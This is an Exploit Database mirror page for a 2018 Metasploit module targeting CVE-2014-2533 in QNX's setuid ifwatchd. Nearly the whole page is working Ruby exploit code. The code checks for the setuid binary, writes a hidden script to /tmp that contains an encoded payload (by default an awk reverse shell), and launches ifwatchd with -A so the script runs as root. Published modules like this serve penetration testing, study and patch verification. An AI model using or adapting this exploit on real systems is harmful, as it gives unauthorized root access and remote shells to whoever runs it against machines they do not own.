ifwatchd – Privilege Escalation (Metasploit)

• Exploit Database
• 81 阅读

• 作者： Metasploit
  日期： 2018-10-09
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/45575/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Post::Linux::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'ifwatchd Privilege Escalation',
  'Description'=> %q{
  This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
  systems by exploiting the ifwatchd suid executable.
  
  ifwatchd allows users to specify scripts to execute using the '-A'
  command line argument; however, it does not drop privileges when
  executing user-supplied scripts, resulting in execution of arbitrary
  commands as root.
  
  This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
  and 6.5.0 SP1 (x86).
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'cenobyte', # Discovery and exploit
  'Tim Brown',# Independent discovery
  'Brendan Coles' # Metasploit
  ],
  'References' =>
  [
  ['CVE', '2014-2533'],
  ['BID', '66449'],
  ['EDB', '32153'],
  ['URL', 'http://seclists.org/bugtraq/2014/Mar/66']
  ],
  'DisclosureDate' => 'Mar 10 2014',
  'Platform' => 'unix', # QNX
  'Arch' => ARCH_CMD,
  'SessionTypes' => %w(shell meterpreter),
  'Targets'=> [['Automatic', {}]],
  'Privileged' => true,
  'Payload'=>
  {
  'BadChars'=> '',
  'DisableNops' => true,
  'Space' => 1024,
  'Compat'=>
  {
  'PayloadType' => 'cmd',
  'RequiredCmd' => 'gawk generic'
  }
  },
  'DefaultOptions' =>
  {
  'WfsDelay' => 10,
  'PAYLOAD'=> 'cmd/unix/reverse_awk'
  }
  ))
  register_advanced_options [
  OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
  ]
  end
  
  def ifwatchd_path
  '/sbin/ifwatchd'
  end
  
  def base_dir
  datastore['WritableDir']
  end
  
  def check
  unless setuid? ifwatchd_path
  vprint_error "#{ifwatchd_path} is not setuid"
  return CheckCode::Safe
  end
  vprint_good "#{ifwatchd_path} is setuid"
  
  CheckCode::Detected
  end
  
  def exploit
  unless check == CheckCode::Detected
  fail_with Failure::NotVulnerable, 'Target not vulnerable'
  end
  
  if is_root?
  fail_with Failure::BadConfig, 'Session already has root privileges'
  end
  
  unless writable? base_dir
  fail_with Failure::BadConfig, "#{base_dir} is not writable"
  end
  
  script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
  
  print_status 'Writing interface arrival event script...'
  cmd_exec "echo '#!/bin/sh' > #{script_path}"
  cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}"
  cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}"
  exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
  cmd_exec "echo \"#{exp}\" >> #{script_path}"
  cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
  register_file_for_cleanup script_path
  
  cmd_exec "chmod +x '#{script_path}'"
  
  print_status "Executing #{ifwatchd_path}..."
  interface = 'lo0'
  cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
  end
  end
  

  Bash

  Copy